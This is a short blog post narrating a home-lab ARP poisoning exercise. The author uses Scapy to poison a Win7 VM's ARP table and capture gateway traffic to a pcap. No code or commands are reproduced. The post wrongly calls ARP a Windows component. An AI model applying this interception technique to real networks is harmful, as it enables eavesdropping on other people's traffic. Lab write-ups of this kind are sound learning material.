ARP poisoning hack exercise, with the use of python's Scapy and Win7 host VM as its target OS.
In this post I will show you how I compromised the host by ARP poisoning with the use of Scapy library.
As I read one of my favorite book, Black Hat Python(which I strong recommend for pentesting), I managed to across an ARP poisoning exploit as one of the Chapter's topic. Did understood the module, that is why I decided to apply what I had read, and perform some cooking. But before that, let me give you some brief introduction about ARP poisoning. ARP(Address Resolution Protocol) is a Windows component that translates a certain IP address to its equivalent MAC Address and vice versa. One of the oldest flaw of such protocol is the ARP poisoning. For one to be a hacker, one must know how to deliver such method with ease, as this type of exploit is a simple ABC to a blackhat. This would serve as bread and butter when a certain attacker already has your ARP poisoned.
Some 2 years ago, as I was just beginning to learn my profession, I have managed to perform ARP poisoning by Kali Linux's own arpspoof and ettercap. Today, I have managed to design my own, with the help of the book's algorithm, I have performed some spoofing.
Walkthrough
I have set 2 VMs, an attacker and a target. Below is my target ipconfig details.
Below is my attacker's network information.
Below is the arp information before the attack. Take a closer look at the MAC address on both the attacker's and target's IP.
From the above image, have a closer look on the both's IP address,MAC address and the default gateway's IP.
Launching the script...
As you can see IP gateway and target IP has been indicated. Seeing the results and performing an arp check on the target machine's cmd, we have below...
MAC address of the Gateway has been successfully poisoned! With this we can sniffed out traffic originating from the gateway. Does, a pcap file has been produced(as what the program is designed to) on the same directory of the python file.
We then launch the pcap file, and below's the result. We just sniffed the entire traffic from the gateway.
=)
Kommentare